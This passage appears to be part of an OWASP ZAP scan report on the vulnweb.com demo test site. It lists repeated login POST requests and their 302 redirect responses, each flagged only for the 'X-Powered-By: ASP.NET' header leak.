Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=13 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=13">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=14 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=14">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=15 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=15">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=16 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=16">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=17 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=17">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=18 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=18">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=19 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=19">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=20 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=20">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=21 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=21">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=22 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=22">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=23 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=23">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=24 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=24">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=25 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=25">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=26 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=26">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=27 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=27">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=28 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=28">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=29 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=29">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=3 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=3">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=30 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=30">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=31 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=31">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=32 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=32">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=33 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=33">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
